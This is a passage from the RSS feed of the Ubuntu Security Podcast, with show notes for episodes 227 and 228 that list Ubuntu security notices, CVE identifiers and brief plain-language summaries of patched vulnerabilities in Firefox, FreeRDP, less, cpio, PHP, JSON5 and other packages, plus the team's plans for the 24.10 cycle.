<li><a href="https://ubuntu.com/security/CVE-2023-47233">CVE-2023-47233</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.4 - all on 16.04, HWE on 14.04</li>
</ul>
<h3 id="usn-6773-1-dot-net-vulnerabilities--05-34">[<a href="https://ubuntu.com/security/notices/USN-6773-1">USN-6773-1</a>] .NET vulnerabilities (05:34)</h3>
<ul>
<li>2 CVEs addressed in Jammy (22.04 LTS), Mantic (23.10), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-30046">CVE-2024-30046</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-30045">CVE-2024-30045</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>dotnet 7 and 8</li>
</ul>
<h3 id="usn-6779-1-firefox-vulnerabilities--05-54">[<a href="https://ubuntu.com/security/notices/USN-6779-1">USN-6779-1</a>] Firefox vulnerabilities (05:54)</h3>
<ul>
<li>14 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-4770">CVE-2024-4770</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-4367">CVE-2024-4367</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-4764">CVE-2024-4764</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-4778">CVE-2024-4778</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-4777">CVE-2024-4777</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-4776">CVE-2024-4776</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-4775">CVE-2024-4775</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-4774">CVE-2024-4774</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-4773">CVE-2024-4773</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-4772">CVE-2024-4772</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-4771">CVE-2024-4771</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-4769">CVE-2024-4769</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-4768">CVE-2024-4768</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-4767">CVE-2024-4767</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>126.0</li>
<li>UAF due to multiple WebRTC threads trying to use an audio input device if it
was just added</li>
<li>type confusion bug in handling of missing fonts -&gt; arbitrary JS execution via
PDF.js (this is in the context of PDF.js which uses the <a href="https://bellard.org/quickjs/quickjs.html">quickjs</a> JS engine
inside the standard ComponentUtils.Sandbox implementation - which is the same
sandbox used to execute JS from websites etc in firefox) - unrelated to this
vuln but PDFs can contain JavaScript (e.g. in a form, to calculate values
based on user input)
<ul>
<li>also PDF.js doesn&rsquo;t implement the PDF APIs related to network or disk etc to
avoid possible security issues</li>
</ul>
</li>
</ul>
<h3 id="usn-6782-1-thunderbird-vulnerabilities--07-29">[<a href="https://ubuntu.com/security/notices/USN-6782-1">USN-6782-1</a>] Thunderbird vulnerabilities (07:29)</h3>
<ul>
<li>6 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-4770">CVE-2024-4770</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-4367">CVE-2024-4367</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-4777">CVE-2024-4777</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-4769">CVE-2024-4769</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-4768">CVE-2024-4768</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-4767">CVE-2024-4767</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>115.11.0</li>
<li>same PDF.js issues and others as above from Firefox</li>
</ul>
<h3 id="usn-6781-1-spreadsheet-parseexcel-vulnerability--07-51">[<a href="https://ubuntu.com/security/notices/USN-6781-1">USN-6781-1</a>] Spreadsheet::ParseExcel vulnerability (07:51)</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-7101">CVE-2023-7101</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>RCE vuln via the use of <code>eval()</code> on untrusted user input - high profile,
disclosed by Mandiant - high profile since it affected Barracuda email gateway
devices and was publicly reported as being exploited against these by a
Chinese APT group</li>
</ul>
<h3 id="usn-6780-1-idna-vulnerability--08-59">[<a href="https://ubuntu.com/security/notices/USN-6780-1">USN-6780-1</a>] idna vulnerability (08:59)</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-3651">CVE-2024-3651</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Python module for handling internationalised domain names (RFC 5895)</li>
<li>CPU-based DoS due to inefficient algorithm when encoding a domain name</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="ubuntu-security-plans-for-24-dot-10-development-cycle--09-33">Ubuntu Security Plans for 24.10 Development Cycle (09:33)</h3>
<ul>
<li>Progressing the FIPS certification for 24.04 though NIST</li>
<li>Implementation of OpenVEX and OSV data formats for machine readable vulnerability information
<ul>
<li>Historically have generated <a href="https://ubuntu.com/security/oval">OVAL</a> data for this purpose</li>
<li>XML-based format, existed for over 20 years</li>
<li>more recently, OpenVEX and OSV have appeared which also serve the same
purpose and have a more vibrant community around them</li>
<li>Similarly, next version of the SPDX format will also support vulnerability
descriptions too</li>
<li>Finally, given the recent announcement that
<a href="https://oval-community-guidelines.readthedocs.io/en/latest/">CIS has
relinquished the role in sponsoring OVAL project</a> and there doesn&rsquo;t appear
to be any other sponsor on the horizon, thought it was prudent to develop a
&ldquo;second-supplier&rdquo; approach given this uncertain future for OVAL upstream</li>
<li>likely will have more to say on this in the future</li>
</ul>
</li>
<li>Improvements to the process the team uses for working with the snap store and doing reviews etc</li>
<li>AppArmor profile development across the 24.10 release</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E228.mp3" length="16372367" type="audio/mpeg" /><itunes:duration>933</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 227
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-227/</link>
          <pubDate>Fri, 03 May 2024 16:53:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>dac27fc0478de34f908353bfab652f82a039179d082bacd34fe18963b11c4267082151362e17318e8260cfee3f5b6260974dee0ffb7c209179d1fe223d19d7a6</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 227</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          Ubuntu 24.04 LTS is finally released and we cover all the new security features
  it brings, plus we look at security vulnerabilities in, and updates for,
  FreeRDP, Zabbix, CryptoJS, cpio, less, JSON5 and a heap more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  Ubuntu 24.04 LTS is finally released and we cover all the new security features
  it brings, plus we look at security vulnerabilities in, and updates for,
  FreeRDP, Zabbix, CryptoJS, cpio, less, JSON5 and a heap more.
  </itunes:summary>
        <description>  Ubuntu 24.04 LTS is finally released and we cover all the new security features
  it brings, plus we look at security vulnerabilities in, and updates for,
  FreeRDP, Zabbix, CryptoJS, cpio, less, JSON5 and a heap more.
  </description>
        <googleplay:description>  Ubuntu 24.04 LTS is finally released and we cover all the new security features
  it brings, plus we look at security vulnerabilities in, and updates for,
  FreeRDP, Zabbix, CryptoJS, cpio, less, JSON5 and a heap more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>Ubuntu 24.04 LTS is finally released and we cover all the new security features
it brings, plus we look at security vulnerabilities in, and updates for,
FreeRDP, Zabbix, CryptoJS, cpio, less, JSON5 and a heap more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>61 unique CVEs addressed</p>
<h3 id="usn-6749-1-freerdp-vulnerabilities--00-45">[<a href="https://ubuntu.com/security/notices/USN-6749-1">USN-6749-1</a>] FreeRDP vulnerabilities (00:45)</h3>
<ul>
<li>7 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-32459">CVE-2024-32459</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-32460">CVE-2024-32460</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-32458">CVE-2024-32458</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-32041">CVE-2024-32041</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-32040">CVE-2024-32040</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-32039">CVE-2024-32039</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-22211">CVE-2024-22211</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Bunch of issues all reported by researcher from Kaspersky - usual sorts of issues in this package - written in C etc</li>
<li>OOB reads, heap buffer overflow, integer overflow / underflow -&gt; OOB write</li>
</ul>
<h3 id="usn-6752-1-freerdp-vulnerabilities--01-41">[<a href="https://ubuntu.com/security/notices/USN-6752-1">USN-6752-1</a>] FreeRDP vulnerabilities (01:41)</h3>
<ul>
<li>4 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-32661">CVE-2024-32661</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-32660">CVE-2024-32660</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-32659">CVE-2024-32659</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-32658">CVE-2024-32658</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Not long after those - more CVEs announced</li>
<li>OOB read, NULL ptr deref and memory exhaustion</li>
</ul>
<h3 id="usn-6657-2-dnsmasq-vulnerabilities--01-54">[<a href="https://ubuntu.com/security/notices/USN-6657-2">USN-6657-2</a>] Dnsmasq vulnerabilities (01:54)</h3>
<ul>
<li>3 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-28450">CVE-2023-28450</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-50868">CVE-2023-50868</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-50387">CVE-2023-50387</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-220/#usn-6657-1-dnsmasq-vulnerabilities--07-10">[USN-6657-1] Dnsmasq vulnerabilities from Episode 220</a></li>
</ul>
<h3 id="usn-6743-3-linux-kernel--azure--vulnerabilities--02-13">[<a href="https://ubuntu.com/security/notices/USN-6743-3">USN-6743-3</a>] Linux kernel (Azure) vulnerabilities (02:13)</h3>
<ul>
<li>5 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-52603">CVE-2023-52603</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26581">CVE-2024-26581</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26591">CVE-2024-26591</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26589">CVE-2024-26589</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52600">CVE-2023-52600</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6750-1-thunderbird-vulnerabilities--02-19">[<a href="https://ubuntu.com/security/notices/USN-6750-1">USN-6750-1</a>] Thunderbird vulnerabilities (02:19)</h3>
<ul>
<li>8 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-3861">CVE-2024-3861</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-3859">CVE-2024-3859</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-3857">CVE-2024-3857</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-3854">CVE-2024-3854</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-3302">CVE-2024-3302</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-3864">CVE-2024-3864</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-3852">CVE-2024-3852</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-2609">CVE-2024-2609</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>115.10.1</li>
</ul>
<h3 id="usn-6751-1-zabbix-vulnerabilities--02-54">[<a href="https://ubuntu.com/security/notices/USN-6751-1">USN-6751-1</a>] Zabbix vulnerabilities (02:54)</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-35230">CVE-2022-35230</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-35229">CVE-2022-35229</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>First time Zabbix has featured in the podcast!</li>
<li>Fixes 2 reflected XSS issues - in newer versions both require the attacker to
be able to specify the user&rsquo;s specific CSRF token - but in older versions only
there was only a session ID which is easier to guess</li>
</ul>
<h3 id="usn-6753-1-cryptojs-vulnerability--03-38">[<a href="https://ubuntu.com/security/notices/USN-6753-1">USN-6753-1</a>] CryptoJS vulnerability (03:38)</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-46233">CVE-2023-46233</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Insecure default config - uses older parameters for the implementation of
PBKDF2 - SHA1 with a single iteration - makes any passwords protected via
PBKDF2 in crypto-js easier to brute-force from the hashed value - instead
updated to use SHA256 with 250,000 rounds</li>
</ul>
<h3 id="usn-6754-1-nghttp2-vulnerabilities--04-32">[<a href="https://ubuntu.com/security/notices/USN-6754-1">USN-6754-1</a>] nghttp2 vulnerabilities (04:32)</h3>
<ul>
<li>4 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-28182">CVE-2024-28182</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-44487">CVE-2023-44487</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9513">CVE-2019-9513</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9511">CVE-2019-9511</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Fixes for most recent issue in HTTP/2 (plus a few older HTTP/2 issues for ESM
releases - HTTP/2 Rapid Reset and 2 disclosed by Netflix back in 2019 which we
covered back in <a href="/episode-43/#usn-4099-1-nginx-vulnerabilities">[USN-4099-1] nginx vulnerabilities from Episode 49</a> -
all DoS attacks)</li>
<li>HTTP/2 continuation frames - no proper limit on the amount of these frames
which can be sent in a single stream - attacker can send many to cause a DoS
on the server either through CPU by lots of processing or memory by storing
all these headers in memory</li>
</ul>
<h3 id="usn-6755-1-gnu-cpio-vulnerabilities--05-42">[<a href="https://ubuntu.com/security/notices/USN-6755-1">USN-6755-1</a>] GNU cpio vulnerabilities (05:42)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-7207">CVE-2023-7207</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Path traversal vuln - possible to write outside of the target directory</li>
<li>Specific to Debian/Ubuntu etc since reverted part of the fix for historic
CVE-2015-1197 - path traversal via inclusion of a malicious symlink in the
archive - since it broke the use of the <code>--no-absolute-filenames</code> CLI argument</li>
<li>Was reverted back in 2.13+dfsg-2 - this was included in all releases of Ubuntu
since focal</li>
<li>Now use more correct fix from upstream (April 2023)</li>
</ul>
<h3 id="usn-6756-1-less-vulnerability--07-10">[<a href="https://ubuntu.com/security/notices/USN-6756-1">USN-6756-1</a>] less vulnerability (07:10)</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-32487">CVE-2024-32487</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Second vuln in less in the last 10 weeks or so - <a href="/episode-220/#usn-6664-1-less-vulnerability--09-40">[USN-6664-1] less vulnerability from Episode 220</a></li>
<li>Similar issue - this time in the use of <code>LESSOPEN</code> environment variable - failed
to properly quote newlines embedded in a filename - could then allow for
arbitrary code execution if ran <code>less</code> on some untrusted file</li>
<li><code>LESSOPEN</code> is automatically set in Debian/Ubuntu via <code>lesspipe</code> - allows to run
less on say a gz compressed log file or even on a tar.gz tarball to list the
files etc</li>
</ul>
<h3 id="usn-6757-1-php-vulnerabilities--08-41">[<a href="https://ubuntu.com/security/notices/USN-6757-1">USN-6757-1</a>] PHP vulnerabilities (08:41)</h3>
<ul>
<li>3 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-3096">CVE-2024-3096</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-2756">CVE-2024-2756</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4900">CVE-2022-4900</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Incomplete fix for historic CVE-2022-31629 - ability for an attacker on the
same network/site could set a cookie via HTTP with one name, which then gets
used by sessions using HTTPS and when using a different cookie name - is a
problem since certain cookie names (like <code>__Host-</code> and <code>__Secure-</code>) have specific
meanings which in general should be allowed to be specified by the network but
only by the browser itself - so can be used to bypass usual restrictions
(apparently this issue was reported upstream by the original reported of the
2022 vuln but it got ignored by upstream till now&hellip;)</li>
<li><code>password_verify()</code> function would sometimes return true for wrong passwords -
ie if the actual password started with a NUL byte and the specified a password
was the empty string would verify as true (unlikely to be an issue in practice)</li>
<li>Heap buffer overflow due to a large <code>PHP_CLI_SERVER_WORKERS</code> env var value -
integer overflow -&gt; wraparound -&gt; allocate small amount of memory for a large
number of values -&gt; buffer overflow (low priority since would need to be able
to set this env var first)</li>
</ul>
<h3 id="usn-6761-1-anope-vulnerability--11-15">[<a href="https://ubuntu.com/security/notices/USN-6761-1">USN-6761-1</a>] Anope vulnerability (11:15)</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-30187">CVE-2024-30187</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Failed to deny ability to reset the password of a suspended account and hence
gain access again</li>
</ul>
<h3 id="usn-6758-1-json5-vulnerability--11-37">[<a href="https://ubuntu.com/security/notices/USN-6758-1">USN-6758-1</a>] JSON5 vulnerability (11:37)</h3>
<ul>
<li>1 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-46175">CVE-2022-46175</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>NodeJS module for the JSON5 format - &ldquo;JSON for humans&rdquo; - much more similar to
yaml, does away with a lot of the usual quotes etc</li>
<li>Protoype pollution vuln - when parsing would fail to restrict use of the
<code>__proto__</code> key and hence would allow the ability to set arbitrary keys etc
within the returned object -&gt; RCE</li>
</ul>
<h3 id="lsn-0103-1-linux-kernel-vulnerability--12-46">[<a href="https://ubuntu.com/security/notices/LSN-0103-1">LSN-0103-1</a>] Linux kernel vulnerability (12:46)</h3>
<ul>
<li>7 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-26597">CVE-2024-26597</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-1086">CVE-2024-1086</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-1085">CVE-2024-1085</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0193">CVE-2024-0193</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-51781">CVE-2023-51781</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6817">CVE-2023-6817</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4569">CVE-2023-4569</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<table>
  <thead>
      <tr>
          <th>Kernel type</th>
          <th>22.04</th>
          <th>20.04</th>
          <th>18.04</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>aws</td>
          <td>103.3</td>
          <td>103.3</td>
          <td>—</td>
      </tr>
      <tr>
          <td>aws-5.15</td>
          <td>—</td>
          <td>103.3</td>
          <td>—</td>
      </tr>
      <tr>
          <td>aws-5.4</td>
          <td>—</td>
          <td>—</td>
          <td>103.3</td>
      </tr>
      <tr>
          <td>aws-6.5</td>
          <td>103.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>azure</td>
          <td>103.3</td>
          <td>103.3</td>
          <td>—</td>
      </tr>
      <tr>
          <td>azure-5.4</td>
          <td>—</td>
          <td>—</td>
          <td>103.3</td>
      </tr>
      <tr>
          <td>azure-6.5</td>
          <td>103.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gcp</td>
          <td>103.3</td>
          <td>103.3</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gcp-5.15</td>
          <td>—</td>
          <td>103.3</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gcp-5.4</td>
          <td>—</td>
          <td>—</td>
          <td>103.3</td>
      </tr>
      <tr>
          <td>gcp-6.5</td>
          <td>103.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>generic-5.15</td>
          <td>—</td>
          <td>103.3</td>
          <td>—</td>
      </tr>
      <tr>
          <td>generic-5.4</td>
          <td>—</td>
          <td>103.3</td>
          <td>103.3</td>
      </tr>
      <tr>
          <td>gke</td>
          <td>103.3</td>
          <td>103.3</td>
          <td>—</td>
      </tr>
      <tr>
          <td>hwe-6.5</td>
          <td>103.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>ibm</td>
          <td>103.3</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>ibm-5.15</td>
          <td>—</td>
          <td>103.3</td>
          <td>—</td>
      </tr>
      <tr>
          <td>linux</td>
          <td>103.3</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>lowlatency-5.15</td>
          <td>—</td>
          <td>103.3</td>
          <td>—</td>
      </tr>
      <tr>
          <td>lowlatency-5.4</td>
          <td>—</td>
          <td>103.3</td>
          <td>103.3</td>
      </tr>
  </tbody>
</table>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>canonical-livepatch status
</span></span></code></pre></div><h3 id="usn-6760-1-gerbv-vulnerability--13-01">[<a href="https://ubuntu.com/security/notices/USN-6760-1">USN-6760-1</a>] Gerbv vulnerability (13:01)</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-4508">CVE-2023-4508</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Vuln found by the Ubuntu Security team - David and (former member) Andrei -
Andrei found this whilst patching Gerbv back in 2023 and doing a bunch of
testing with ASan enabled - crafted filename -&gt; crash</li>
</ul>
<h3 id="usn-6759-1-freerdp-vulnerabilities--13-41">[<a href="https://ubuntu.com/security/notices/USN-6759-1">USN-6759-1</a>] FreeRDP vulnerabilities (13:41)</h3>
<ul>
<li>5 CVEs addressed in Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-32662">CVE-2024-32662</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-32661">CVE-2024-32661</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-32660">CVE-2024-32660</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-32659">CVE-2024-32659</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-32658">CVE-2024-32658</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6737-2-gnu-c-library-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6737-2">USN-6737-2</a>] GNU C Library vulnerability</h3>
<ul>
<li>1 CVEs addressed in Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-2961">CVE-2024-2961</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6729-3-apache-http-server-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6729-3">USN-6729-3</a>] Apache HTTP Server vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-27316">CVE-2024-27316</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-24795">CVE-2024-24795</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-38709">CVE-2023-38709</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6718-3-curl-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6718-3">USN-6718-3</a>] curl vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-2398">CVE-2024-2398</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-2004">CVE-2024-2004</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6733-2-gnutls-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6733-2">USN-6733-2</a>] GnuTLS vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-28835">CVE-2024-28835</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-28834">CVE-2024-28834</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6734-2-libvirt-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6734-2">USN-6734-2</a>] libvirt vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Noble (24.04 LTS)
<ul>
